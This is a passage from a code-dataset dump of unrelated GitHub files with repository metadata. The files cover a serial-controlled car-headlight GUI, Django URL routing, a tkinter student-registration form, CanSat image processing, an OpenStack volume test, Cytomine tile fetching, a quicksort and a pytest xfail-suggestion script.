\"haretli\":\n if dayEstimationString == \"nolight\":\n dayEstimationStringTemp = \"nolight\"\n if IsComActive:\n CloseLights()\n dayEstimationStringAlias = \"isiklar kapali(Gunduz)\"\n if dayEstimationString == \"nightlong\":\n dayEstimationStringTemp = \"nightlong\"\n if IsComActive:\n LongLights()\n dayEstimationStringAlias = \"isiklar acik(cok karanlik)\"\n if dayEstimationString == \"nightshort\":\n dayEstimationStringTemp = \"nightshort\"\n if IsComActive:\n ShortLights()\n dayEstimationStringAlias = \"isiklar acik(sehir ici yada otoban)\"\n if dayEstimationString == \"daylight\":\n dayEstimationStringTemp = \"daylight\"\n if IsComActive:\n DayLights()\n dayEstimationStringAlias = \"isiklar acik(aksam vakti)\"\n if IsNodifyActive:\n if IsComActive:\n LongLights()\n ShortLights()\n cv2.putText(original_frame, \"uyari\", (50, 150), \n font, 0.8, textColor, 2, cv2.LINE_AA) \n cv2.putText(original_frame, dayEstimationStringAlias, (50, 50), \n font, 0.8, textColor, 2, cv2.LINE_AA)\n cv2.putText(original_frame, MotionAlias, (50, 100), \n font, 0.8, textColor, 2, cv2.LINE_AA) \n cv2.moveWindow('origin', 680,30)\n cv2.imshow('origin',original_frame)\n LightSourceDetectionCount = 0\n ListSourceSize = (0,0)\n frameID += 1\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n cap.release()\n cv2.destroyAllWindows()\n break\n else:\n break\n else: \n PrintScreen(\"Henüz Dosya Seçmediniz\")\n\nComfields = ('COM port', 'Baudrate')\n\ndef makeform(root, fields):\n entries = {}\n for field in fields:\n print(field)\n row = tk.Frame(root)\n lab = tk.Label(row, width=22, text=field+\": \", anchor='w')\n ent = tk.Entry(row)\n ent.insert(0, \"0\")\n row.pack(side=tk.TOP, \n fill=tk.X, \n padx=5, \n pady=5)\n lab.pack(side=tk.LEFT)\n ent.pack(side=tk.RIGHT, \n expand=tk.YES, \n fill=tk.X)\n entries[field] = ent\n return entries\n\nConnected = False\nReading = False\nMicrocontrollerSerial = serial.Serial()\ndef CheckMicrocontrollerCom():\n global Connected\n global MicrocontrollerSerial\n if not Connected:\n portName = \"COM\" + str(GetComValues.ComPortNumber)\n MicrocontrollerSerial = serial.Serial(portName, GetComValues.ComPortBaudRate)\n time.sleep(1) #give the connection a second to settle str.encode(\"Hello\")\n Connected = True\n firstMessage = threading.Thread( target=StartListening, args= ( ))\n firstMessage.start()\n \n\n\ndef StartListening():\n global Reading\n if not Reading:\n global MicrocontrollerSerial\n Reading = True\n while True:\n data = MicrocontrollerSerial.read()\n if(data):\n print(data)\n\ndef VideoAdd():\n ChooseVideo()\n\ndef StartTravel():\n ProcessTravel(False)\n\ndef GetComValues(entries):\n GetComValues.ComPortNumber = int(entries['COM port'].get()) if check_int(entries['COM port'].get()) else 0 \n GetComValues.ComPortBaudRate =int(entries['Baudrate'].get()) if check_int(entries['Baudrate'].get()) else 0 \n\n\ndef SetupEmbeded():\n rootInput = tk.Tk()\n ents = makeform(rootInput, Comfields)\n b1 = tk.Button(rootInput, text='Değerleri Kaydet',\n command=(lambda e=ents: GetComValues(e)))\n b1.pack(side=tk.LEFT, padx=5, pady=5)\n #b2 = tk.Button(rootInput, text='Kapat', command=rootInput.quit)\n #b2.pack(side=tk.LEFT, padx=5, pady=5)\n rootInput.mainloop()\n\ndef StartWithEmbeded():\n CheckMicrocontrollerCom()\n ProcessTravel(True)\n\ndef LongLights():\n CheckMicrocontrollerCom()\n global MicrocontrollerSerial\n MicrocontrollerSerial.write('u'.encode())\n\ndef ShortLights():\n CheckMicrocontrollerCom()\n global MicrocontrollerSerial\n MicrocontrollerSerial.write('k'.encode())\n\ndef 
DayLights():\n CheckMicrocontrollerCom()\n global MicrocontrollerSerial\n MicrocontrollerSerial.write('g'.encode())\n\ndef CloseLights():\n CheckMicrocontrollerCom()\n global MicrocontrollerSerial\n MicrocontrollerSerial.write('y'.encode())\n\nButton(tool_bar, text=\"Video Seçimi Yap\",command=VideoAdd,bg='brown',fg='white').grid(row=1, column=0, padx=5, pady=5)\nButton(tool_bar, text=\"Yola Çık\",command=StartTravel,bg='brown',fg='white').grid(row=2, column=0, padx=5, pady=5)\nButton(tool_bar, text=\"Gömülü Sistlem ayarla\",command=SetupEmbeded,bg='brown',fg='white').grid(row=3, column=0, padx=5, pady=5)\nButton(tool_bar, text=\"Gömülü ile Yola Çık\",command=StartWithEmbeded,bg='brown',fg='white').grid(row=4, column=0, padx=5, pady=5)\nButton(tool_bar, text=\"Uzun Farları Yak\",command=LongLights,bg='brown',fg='white').grid(row=5, column=0, padx=5, pady=5)\nButton(tool_bar, text=\"Kısa Farları Yak\",command=ShortLights,bg='brown',fg='white').grid(row=6, column=0, padx=5, pady=5)\nButton(tool_bar, text=\"Gündüz Farları Yak\",command=DayLights,bg='brown',fg='white').grid(row=7, column=0, padx=5, pady=5)\nButton(tool_bar, text=\"Tüm Farları Kapat\",command=CloseLights,bg='brown',fg='white').grid(row=8, column=0, padx=5, pady=5)\nroot.mainloop()","repo_name":"erenokur/python-automotive-auto-lighting","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":16316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"39915123150","text":"from django.contrib import admin\nfrom django.urls import path\nfrom django.conf.urls import include\n\nfrom rest_framework import routers, permissions\n\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nfrom ingredient.views import IngredientViewSet\nfrom shopping.views import ShoppingListViewSet, ShoppingListItemViewSet\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Snippets API\",\n default_version='v1',\n description=\"Test description\",\n terms_of_service=\"https://www.google.com/policies/terms/\",\n contact=openapi.Contact(email=\"contact@snippets.local\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=[permissions.AllowAny],\n)\n\nrouter = routers.SimpleRouter()\nrouter.register(r'ingredients', IngredientViewSet, basename='Ingredient')\nrouter.register(r'shoppinglists', ShoppingListViewSet, basename='ShoppingList')\nrouter.register(r'shoppinglistitems', ShoppingListItemViewSet, basename='ShoppingListItem')\n\nurlpatterns = [\n path('swagger/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n path('admin/', admin.site.urls),\n path('api/', include(router.urls))\n]\n","repo_name":"thomashbrnrd/backend-developer-test","sub_path":"backend_test/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34809516599","text":"from asyncio.windows_events import NULL\nfrom tkinter import *\nfrom Database import funciones\nfrom tkinter.messagebox import showerror, showinfo, showwarning\nfrom tkinter import ttk\n\ndef registrarEstudiante():\n\n carrerasDict = {}\n y2 = Frame()\n y2.place(x=0, y=0, width=500, height=1000)\n y2.config(background = \"#213141\")\n y3 = Label(y2, text=\"REGISTRAR ESTUDIANTE\",bg='black', fg='white', width=25,font=(\"bold\", 22))\n y3.place(x=40, y=60)\n\n # Creating FullName\n b = Label(y2, text=\"ID:\", width=20, 
font=(\"bold\", 12))\n b.place(x=75, y=130)\n # Creating Entry For FullName\n b1 = Entry(y2)\n b1.place(x=300, y=130)\n\n # Creating CI\n c = Label(y2, text=\"CI:\", width=20, font=(\"bold\", 12))\n c.place(x=75, y=180)\n # Creating Entry For CI\n c1 = Entry(y2)\n c1.place(x=300, y=180)\n\n # Creating NOMBRE\n d = Label(y2, text=\"NOMBRE:\", width=20, font=(\"bold\", 12))\n d.place(x=75, y=230)\n # Creating Entry For NOMBRE\n d1 = Entry(y2)\n d1.place(x=300, y=232)\n\n # Creating DIRECCION\n e = Label(y2, text=\"DIRECCION:\", width=20, font=(\"bold\", 12))\n e.place(x=75, y=280)\n # Creating Entry For DIRECCION\n e1 = Entry(y2)\n e1.place(x=300, y=280)\n\n # Creating NOMBRE CARRERA\n f = Label(y2, text=\"ID CARRERA:\", width=20, font=('bold', 12))\n f.place(x=75, y=330)\n # Creating Entry For NOMBRE CARRERA\n\n # Combobox creation\n n = StringVar()\n monthchoosen = ttk.Combobox(y2, state=\"readonly\", width = 20, textvariable = n)\n monthchoosen.place(x=300, y=332)\n # Adding combobox drop down list\n def getCarreras():\n res = funciones.selectCarrera()\n carrerasName=[]\n for i in res:\n if i[1] not in carrerasDict:\n carrerasDict[i[1]]=i[0]\n carrerasName.append(i[1])\n monthchoosen['values'] = carrerasName\n getCarreras()\n monthchoosen.current()\n\n # Creating Confirm EDAD\n g = Label(y2, text=\"EDAD:\", width=20, font=('bold', 12))\n g.place(x=75, y=380)\n # Creating Entry For Confirm EDAD\n g1 = Entry(y2)\n g1.place(x=300, y=382)\n def callback():\n if(b1.get()=='' and n.get()==''):\n showwarning(\"Arquitectura empresarial\", \"ID y CARRERA son campos requeridos\") \n elif(b1.get()==''):\n showwarning(\"Arquitectura empresarial\", \"ID es un campo requerido\") \n elif(n.get()==''):\n showwarning(\"Arquitectura empresarial\", \"CARRERA es un campo requerido\") \n else:\n if(funciones.validarID(b1.get())):\n showwarning(\"Arquitectura empresarial\", f\"El ID {b1.get()} ya se encuentra registrado\") \n else:\n dict = {\n \"ID\":\"'\"+b1.get()+\"'\",\n \"CI\":(\"'\"+c1.get()+\"'\" if c1.get()!='' else \"'NULL'\"),\n \"NOMBRE\":(\"'\"+d1.get()+\"'\" if d1.get()!='' else \"'NULL'\"),\n \"DIRECCION\":(\"'\"+e1.get()+\"'\" if e1.get()!='' else \"'NULL'\"),\n \"CARRERA\":\"'\"+carrerasDict[n.get()]+\"'\",\n \"EDAD\":(\"'\"+g1.get()+\"'\" if g1.get()!='' else \"NULL\")\n }\n try:\n res = funciones.registerEstudiante(dict[\"ID\"],dict[\"CI\"], dict[\"NOMBRE\"], dict[\"DIRECCION\"],dict[\"CARRERA\"],dict[\"EDAD\"])\n if(res[\"status\"]==1):\n showinfo(\"Arquitectura empresarial\", res[\"message\"])\n y2.destroy()\n except Exception as ex:\n print(ex)\n showerror(\"Arquitectura empresarial\", \"Ocurrio un error al registrar estudiante\")\n\n Button(y2, text='SUBMIT', width=20, bg=\"#04d616\", fg='white', command=callback).place(x=180, y=420)\n\n\n Button(y2, text='RETURN', width=20, bg=\"#cd5656\", fg='white', command=lambda:[y2.destroy()]).place(x=180, y=460)\n","repo_name":"dgonzalezt2/MSSQL_with_PythonGUI","sub_path":"GUI/views/student/registrar.py","file_name":"registrar.py","file_ext":"py","file_size_in_byte":3827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"74327657511","text":"import numpy as np\nimport cv2\nimport math\nimport time\n\n\nclass Mask:\n\n def __init__(self, image_name):\n\n self.image_name = image_name\n image = cv2.imread(self.image_name)\n self.image_data = np.asarray(image)\n self.image_subsets = list()\n self.image_approx = None\n [self.shape_x, self.shape_y, self.shape_z] = self.image_data.shape\n 
self.max_pixels = None\n centre_x = float(self.shape_y / 2)\n centre_y = float(self.shape_x / 2)\n self.centre = [centre_x, centre_y]\n\n # x is the rows, y the columns and z is the depth.\n\n def fifth_iteration(self, red, green, subtracting=True):\n image = self.process(red, green, subtracting)\n output = self.gaussian_blur(image, 101)\n cv2.imwrite('Images/Showcase6_Blurred_Circle_0.75.jpg', output)\n [distance, theta, theta_2] = self.direction_finding()\n return distance, theta, theta_2\n\n def process(self, red, green, subtracting):\n blue_layer = self.image_data.copy()\n\n if subtracting:\n blue_layer[:, :, 0] = blue_layer[:, :, 0] - (red * blue_layer[:, :, 1] + green * blue_layer[:, :, 2])\n blue_layer[:, :, 0][blue_layer[:, :, 0] < 0] = 0\n\n for i in range(1, 3):\n blue_layer[:, :, i] = np.zeros([self.shape_x, self.shape_y])\n image = cv2.cvtColor(blue_layer, code=cv2.COLOR_BGR2GRAY)\n # cv2.imwrite('Showcase4_Processed_0.5.jpg', image)\n return image\n\n def gaussian_blur(self, image, radius):\n image = cv2.GaussianBlur(image, (radius, radius), 0)\n (minVal, maxVal, minLoc, maxLoc) = cv2.minMaxLoc(image)\n self.max_pixels = [float(maxLoc[0]), float(maxLoc[1])]\n image = self.image_data.copy()\n cv2.circle(image, maxLoc, radius, (255, 0, 0), 20)\n centre_coord = [int(x) for x in self.centre]\n cv2.circle(image, tuple(centre_coord), radius, (0, 255, 0), 20)\n return image\n\n def direction_finding(self):\n distance = int(math.dist(self.centre, self.max_pixels))\n\n difference = []\n\n zip_ob = zip(self.centre, self.max_pixels)\n for list1_i, list2_i in zip_ob:\n difference.append(list2_i - list1_i)\n\n diff_arr = np.array(difference)\n theta = np.arctan2(diff_arr[1], diff_arr[0]) * 180 / np.pi\n theta_2 = np.arctan2(distance, 1000) * 180 / np.pi\n\n return distance, theta, theta_2\n\n\ndef test_fifth_iteration():\n mask = Mask('Images/Test 2.jpg')\n distance, theta, theta_2 = mask.fifth_iteration(red=0.75, green=0.75)\n return distance, theta, theta_2\n\ntimes = []\nfor i in range(3):\n\n start = time.time()\n print(test_fifth_iteration())\n end = time.time()\n elapsed_time = end - start\n times.append(elapsed_time)\n\nprint(times)\nprint(sum(times)/3)\n\n\n","repo_name":"jamminson/CANSAT","sub_path":"Iteration_5.py","file_name":"Iteration_5.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29178647105","text":"import testtools\n\nfrom tempest.common.utils.linux.remote_client import RemoteClient\nimport tempest.config\nfrom tempest.test import attr\nfrom tempest.tests.compute import base\n\n\nclass AttachVolumeTestJSON(base.BaseComputeTest):\n _interface = 'json'\n run_ssh = tempest.config.TempestConfig().compute.run_ssh\n\n def __init__(self, *args, **kwargs):\n super(AttachVolumeTestJSON, self).__init__(*args, **kwargs)\n self.server = None\n self.volume = None\n self.attached = False\n\n @classmethod\n def setUpClass(cls):\n super(AttachVolumeTestJSON, cls).setUpClass()\n cls.device = 'vdb'\n\n def _detach(self, server_id, volume_id):\n self.servers_client.detach_volume(server_id, volume_id)\n self.volumes_client.wait_for_volume_status(volume_id, 'available')\n\n def _delete(self, volume):\n if self.volume:\n self.volumes_client.delete_volume(self.volume['id'])\n self.volume = None\n\n def _create_and_attach(self):\n # Start a server and wait for it to become ready\n resp, server = self.create_server(wait_until='ACTIVE',\n adminPass='password')\n\n # Record addresses so that 
we can ssh later\n resp, server['addresses'] = \\\n self.servers_client.list_addresses(server['id'])\n\n # Create a volume and wait for it to become ready\n resp, volume = self.volumes_client.create_volume(1,\n display_name='test')\n self.volume = volume\n self.volumes_client.wait_for_volume_status(volume['id'], 'available')\n\n # Attach the volume to the server\n self.servers_client.attach_volume(server['id'], volume['id'],\n device='/dev/%s' % self.device)\n self.volumes_client.wait_for_volume_status(volume['id'], 'in-use')\n\n self.attached = True\n\n @attr(type='positive')\n @testtools.skipIf(not run_ssh, 'SSH required for this test')\n def test_attach_detach_volume(self):\n # Stop and Start a server with an attached volume, ensuring that\n # the volume remains attached.\n try:\n self._create_and_attach()\n server = self.server\n volume = self.volume\n\n self.servers_client.stop(server['id'])\n self.servers_client.wait_for_server_status(server['id'], 'SHUTOFF')\n\n self.servers_client.start(server['id'])\n self.servers_client.wait_for_server_status(server['id'], 'ACTIVE')\n\n linux_client = RemoteClient(server,\n self.ssh_user, server['adminPass'])\n partitions = linux_client.get_partitions()\n self.assertTrue(self.device in partitions)\n\n self._detach(server['id'], volume['id'])\n self.attached = False\n\n self.servers_client.stop(server['id'])\n self.servers_client.wait_for_server_status(server['id'], 'SHUTOFF')\n\n self.servers_client.start(server['id'])\n self.servers_client.wait_for_server_status(server['id'], 'ACTIVE')\n\n linux_client = RemoteClient(server,\n self.ssh_user, server['adminPass'])\n partitions = linux_client.get_partitions()\n self.assertFalse(self.device in partitions)\n except Exception:\n self.fail(\"The test_attach_detach_volume is faild!\")\n finally:\n if self.attached:\n self._detach(server['id'], volume['id'])\n # NOTE(maurosr): here we do the cleanup for volume, servers are\n # dealt on BaseComputeTest.tearDownClass\n self._delete(self.volume)\n\n\nclass AttachVolumeTestXML(AttachVolumeTestJSON):\n _interface = 'xml'\n","repo_name":"rvbelapure/openstack-nova-sched","sub_path":"tempest/tempest/tests/compute/volumes/test_attach_volume.py","file_name":"test_attach_volume.py","file_ext":"py","file_size_in_byte":3820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40240887349","text":"import os\nimport numpy as np\n\nfrom skimage.io import imread\nfrom abc import abstractmethod\nfrom cytomine import Cytomine\nfrom cytomine.models._utilities import parallel\nfrom sldc import Tile, TileExtractionException, TileTopology, alpha_rasterize\nfrom sldc_cytomine import CytomineSlide\n\n\nclass CytomineDownloadableTile(Tile):\n \"\"\"An abstract tile implementation that downloads the tile from a server and caches it in a local folder\"\"\"\n def __init__(self, working_path, parent, offset, width, height, tile_identifier=None, polygon_mask=None):\n Tile.__init__(self, parent, offset, width, height, tile_identifier=tile_identifier, polygon_mask=polygon_mask)\n self._working_path = working_path\n\n @abstractmethod\n def download_tile_image(self):\n pass \n\n @property\n def cache_filename(self):\n image_instance = self.base_image.image_instance\n x, y, width, height = self.abs_offset_x, self.abs_offset_y, self.width, self.height\n zoom = self.base_image.zoom_level\n cache_filename_format = \"{id}-{zoom}-{x}-{y}-{w}-{h}.png\"\n return cache_filename_format.format(id=image_instance.id, x=x, y=y, w=width, 
h=height, zoom=zoom)\n\n @property\n def cache_filepath(self):\n return os.path.join(self._working_path, self.cache_filename)\n\n @property\n def np_image(self):\n try:\n if not os.path.exists(self.cache_filepath) and not self.download_tile_image():\n raise TileExtractionException(\"Cannot fetch tile at for '{}'.\".format(self.cache_filename))\n\n np_array = imread(self.cache_filepath)\n\n # if np_array.shape[:2] != (self.height, self.width) or np_array.shape[2] != self.base_image.channels:\n # raise TileExtractionException(\"Fetched image has invalid size : {} instead \"\n # \"of {}\".format(np_array.shape, (self.width, self.height, self.channels)))\n\n if np_array.shape[2] == 4:\n np_array = np_array[:, :, 3]\n np_array = np_array.astype(\"uint8\")\n return self.add_polygon_mask(np_array)\n except IOError as e:\n raise TileExtractionException(str(e))\n\n def add_polygon_mask(self, image):\n try:\n return alpha_rasterize(image, self.polygon_mask)\n except:\n return image\n\n\nclass CytomineZoomifyTile(CytomineDownloadableTile):\n \"\"\"Tile fetch using the Zoomify protocol (for older Cytomine versions)\"\"\"\n def download_tile_image(self):\n slide = self.base_image\n col_tile = self.abs_offset_x // 256\n row_tile = self.abs_offset_y // 256\n _slice = slide.image_instance\n response = Cytomine.get_instance().get('imaging_server.json', None)\n imageServerUrl = response['collection'][0]['url']\n return Cytomine.get_instance().download_file(imageServerUrl + \"/image/tile\", self.cache_filepath, False, payload={\n \"zoomify\": _slice.fullPath,\n \"mimeType\": _slice.mime,\n \"x\": col_tile,\n \"y\": row_tile,\n \"z\": slide.api_zoom_level\n })\n\n\nclass CytomineIIPTile(CytomineDownloadableTile):\n def download_tile_image(self):\n slide = self.base_image\n if not isinstance(slide, CytomineSlide):\n raise TypeError(f\"CytomineIIP tile should be used in conjunction with CytomineSlide only (as base image), found `{type(slide)}`\")\n iip_topology = TileTopology(slide, None, max_width=256, max_height=256, overlap=0)\n col_tile = self.abs_offset_x // 256\n row_tile = self.abs_offset_y // 256\n iip_tile_index = col_tile + row_tile * iip_topology.tile_horizontal_count\n _slice = slide.slice_instance\n return Cytomine.get_instance().download_file(_slice.imageServerUrl + \"/slice/tile\", self.cache_filepath, False, payload={\n \"fif\": _slice.path,\n \"mimeType\": _slice.mime,\n \"tileIndex\": iip_tile_index,\n \"z\": slide.api_zoom_level\n })\n\n\nclass CytominePimsTile(CytomineDownloadableTile):\n \"\"\"Tile fetch using the Zoomify protocol (for older Cytomine versions)\"\"\"\n def download_tile_image(self):\n slide = self.base_image\n if not isinstance(slide, CytomineSlide):\n raise TypeError(f\"CytominePims tile should be used in conjunction with CytomineSlide only (as base image), found `{type(slide)}`\")\n iip_topology = TileTopology(slide, None, max_width=256, max_height=256, overlap=0)\n col_tile = self.abs_offset_x // 256\n row_tile = self.abs_offset_y // 256\n tile_index = col_tile + row_tile * iip_topology.tile_horizontal_count\n _slice = slide.slice_instance\n zoom = self.base_image.image_instance.zoom - slide.zoom_level\n return Cytomine.get_instance().download_file(f\"{_slice.imageServerUrl}/image/{_slice.path}/normalized-tile/zoom/{zoom}/ti/{tile_index}.jpg\", self.cache_filepath, False, payload={\n \"z_slices\": \"0\",\n \"timepoints\": \"0\",\n \"channels\": \"0,1,2\",\n \"colormaps\": \"#f00,#0f0,#00f\",\n })\n\n\nclass CytomineWindowTile(CytomineDownloadableTile):\n \"\"\"Tiling 
using the window service\"\"\"\n def download_tile_image(self):\n return self.base_image.image_instance.window(\n x=self.abs_offset_x,\n y=self.abs_offset_y,\n w=self.width,\n h=self.height,\n dest_pattern=self.cache_filepath\n )\n\n\nclass CytomineTile(Tile):\n def __init__(self, working_path, parent, offset, width, height, tile_class=CytomineIIPTile, tile_identifier=None, polygon_mask=None, n_jobs=1):\n \"\"\"A abritrarily sized cytomine tile. Will be re-constructed by fetching smaller tiles using the specified\n protocol.\n\n Parameters\n ----------\n parent: Image\n The image from which is extracted the tile\n offset: (int, int)\n The x and y coordinates of the pixel at the origin point of the slide in the parent image.\n Coordinates order is the following : (x, y).\n width: int\n The width of the tile\n height: int\n The height of the tile\n tile_class: class\n A subclass of 'CytomineDownloadableTile', specifies the download protocol for underlying tiles.\n The current tile will be built by downloading non-overlapping 256x256 tiles using the given protocol and\n assembling them into the expected tile. By default, uses IIP through Cytomine API (class `CytomineIIPTile`).\n tile_identifier: int, optional (default: None)\n A integer identifier that identifies uniquely the tile among a set of tiles\n polygon_mask: Polygon (optional, default: None)\n The polygon representing the alpha mask to apply to the tile window\n\n\n Notes\n -----\n The coordinates origin is the leftmost pixel at the top of the slide\n \"\"\"\n Tile.__init__(self, parent, offset, width, height, tile_identifier=tile_identifier, polygon_mask=polygon_mask)\n self._working_path = working_path\n self._n_jobs = n_jobs\n self._tile_class = tile_class\n os.makedirs(working_path, exist_ok=True)\n\n def _pad_iip_tile(self, img):\n padding = [(0, 256 - img.shape[0]), (0, 256 - img.shape[1])]\n if img.ndim == 3:\n padding += [(0, 0)]\n return np.pad(img, padding, mode='constant', constant_values=0)\n\n def _iip_window(self):\n left_margin = self.abs_offset_x % 256\n top_margin = self.abs_offset_y % 256\n right_margin = 256 - (self.abs_offset_x + self.width) % 256\n bottom_margin = 256 - (self.abs_offset_y + self.height) % 256\n margins = [top_margin, left_margin, bottom_margin, right_margin]\n \n offset = self.abs_offset_x - left_margin, self.abs_offset_y - top_margin\n width = self.width + left_margin + right_margin\n height = self.height + top_margin + bottom_margin\n window = self.base_image.window(offset=offset, max_width=width, max_height=height)\n\n return window, offset, (width, height), margins\n\n @property\n def np_image(self):\n from sldc_cytomine.tile_builder import CytomineGenericTileBuilder\n window, _, (width, height), margins = self._iip_window()\n builder = CytomineGenericTileBuilder(self._tile_class, self._working_path)\n topology = TileTopology(window, builder, max_width=256, max_height=256, overlap=0)\n\n def download_tile(tile):\n return tile.np_image\n\n rebuilt = np.zeros([height, width, self.base_image.channels], dtype=np.uint8)\n for tile, tile_image in parallel.generic_download(list(topology), download_tile, n_workers=self._n_jobs):\n y_start, x_start = tile.offset_y, tile.offset_x\n y_end, x_end = y_start + 256, x_start + 256\n rebuilt[y_start:y_end, x_start:x_end] = self._pad_iip_tile(tile_image)\n\n return rebuilt[margins[0]:-margins[2], margins[1]:-margins[3]]\n\n def fetch_subtiles(self):\n \"\"\"fetch underlying tiles without loading them into memory\"\"\"\n from sldc_cytomine.tile_builder import 
CytomineGenericTileBuilder\n window, _, _, _ = self._iip_window()\n builder = CytomineGenericTileBuilder(self._tile_class, self._working_path)\n topology = TileTopology(window, builder, max_width=256, max_height=256, overlap=0)\n \n def download_tile(tile: CytomineDownloadableTile):\n return tile.download_tile_image()\n\n _ = parallel.generic_download(list(topology), download_tile, n_workers=self._n_jobs)","repo_name":"waliens/sldc-cytomine","sub_path":"sldc_cytomine/tile.py","file_name":"tile.py","file_ext":"py","file_size_in_byte":8947,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22140991190","text":"from setuptools import setup, find_packages\nimport os\n\n# Utility function to read the README file.\n# Used for the long_description. It's nice, because now 1) we have a top level\n# README file and 2) it's easier to type in the README file than to put a raw\n# string in below ...\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n name='geodjango-uscampgrounds',\n version='2.0',\n description='A set of Django models to store the data files from uscampgrounds.info',\n author='Adam Fast',\n author_email='adamfast@gmail.com',\n url='https://github.com/adamfast/geodjango-uscampgrounds',\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n long_description=read('README.txt'),\n license = \"BSD\",\n keywords = \"django geodjango\",\n classifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"Environment :: Web Environment\",\n \"Framework :: Django\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Internet :: WWW/HTTP\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n)\n","repo_name":"adamfast/geodjango-uscampgrounds","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"42667762302","text":"#퀵정렬 : 기준 데이터 설정 -> 그 기준보다 큰 데이터와 작은 데이터의 위치 바꿈\n#시간복잡도 : O(NlogN) \n##basic : 첫 번째 데이터를 기준 데이터(pivot)으로 설정\n\narray = [5,7,9,0,3,1,6,2,4,8]\n\ndef quick_sort(array, start, end) :\n if start >= end :\n return\n pivot = start\n left = start+1\n right = end\n while(left<=right) :\n while(left<=end and array[left] <= array[pivot]) :\n left+=1\n\n while(right>start and array[right] >= array[pivot]) :\n right -=1\n if (left>right) :\n array[right], array[pivot] = array[pivot], array[right]\n\n else :\n array[left], array[right] = array[right], array[left]\n quick_sort(array, start, right-1)\n quick_sort(array, right+1, end)\nquick_sort(array, 0, len(array)-1)\nprint(array)","repo_name":"parkjeongmi/jamie_study","sub_path":"sort/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14821936969","text":"import re\nimport torch\n\n\"\"\"\nInstructions:\n\n1. pytest -n 8 test/test_vmap.py test/test_ops.py test/test_aotdispatch.py > result.txt\n2. 
python test/xfail_suggester.py\n\"\"\"\n\nwith open('result.txt') as f:\n lines = f.readlines()\n\nfailed = [line for line in lines if line.startswith('FAILED')]\np = re.compile('FAILED test/test_\\w+.py::\\w+::(\\S+)') # noqa: W605\n\n\ndef get_failed_test(line):\n m = p.match(line)\n if m is None:\n return None\n return m.group(1)\n\n\nbase_names = {\n 'test_grad_',\n 'test_vjp_',\n 'test_vmapvjp_',\n 'test_vmapvjp_has_batch_rule_',\n 'test_vjpvmap_',\n 'test_jvp_',\n 'test_vmapjvp_',\n 'test_vmapjvpall_has_batch_rule_',\n 'test_vmapjvpall_',\n 'test_jvpvjp_',\n 'test_vjpvjp_',\n 'test_decomposition_',\n 'test_make_fx_exhaustive_',\n 'test_vmap_exhaustive_',\n 'test_op_has_batch_rule_',\n 'test_vmap_autograd_grad_',\n}\n\nfailed_tests = [get_failed_test(line) for line in lines]\nfailed_tests = [match for match in failed_tests if match is not None]\nfailed_tests = sorted(failed_tests)\n\nsuggested_xfails = {}\n\n\ndef remove_device_dtype(test):\n return '_'.join(test.split('_')[:-2])\n\n\ndef belongs_to_base(test, base):\n if not test.startswith(base):\n return False\n candidates = [try_base for try_base in base_names if len(try_base) > len(base)]\n for candidate in candidates:\n if test.startswith(candidate):\n return False\n return True\n\n\ndef parse_namespace(base):\n mappings = {\n 'nn_functional_': 'nn.functional',\n 'fft_': 'fft',\n 'linalg_': 'linalg',\n '_masked_': '_masked',\n 'sparse_': 'sparse',\n 'special_': 'special',\n }\n for heading in mappings.keys():\n if base.startswith(heading):\n return mappings[heading], base[len(heading):]\n return None, base\n\n\ndef get_torch_module(namespace):\n if namespace is None:\n return torch\n if namespace == 'nn.functional':\n return torch.nn.functional\n return getattr(torch, namespace)\n\n\ndef parse_base(base):\n namespace, rest = parse_namespace(base)\n\n apis = dir(get_torch_module(namespace))\n apis = sorted(apis, key=lambda x: -len(x))\n\n api = rest\n variant = ''\n for candidate in apis:\n if rest.startswith(candidate):\n api = candidate\n variant = rest[len(candidate) + 1:]\n break\n print(base, namespace, api, variant)\n return namespace, api, variant\n\n\ndef any_starts_with(strs, thing):\n for s in strs:\n if s.startswith(thing):\n return True\n return False\n\n\ndef get_suggested_xfails(base, tests):\n result = []\n tests = [test[len(base):] for test in tests if\n belongs_to_base(test, base)]\n\n base_tests = {remove_device_dtype(test) for test in tests}\n tests = set(tests)\n for base in base_tests:\n cpu_variant = base + '_cpu_float32'\n cuda_variant = base + '_cuda_float32'\n namespace, api, variant = parse_base(base)\n if namespace is None:\n api = api\n else:\n api = f'{namespace}.{api}'\n if cpu_variant in tests and cuda_variant in tests:\n result.append(f\"xfail('{api}', '{variant}'),\")\n continue\n if cpu_variant in tests:\n result.append(f\"xfail('{api}', '{variant}', device_type='cpu'),\")\n continue\n if cuda_variant in tests:\n result.append(f\"xfail('{api}', '{variant}', device_type='cuda'),\")\n continue\n result.append(f\"skip('{api}', '{variant}',\")\n return result\n\n\nresult = {base: 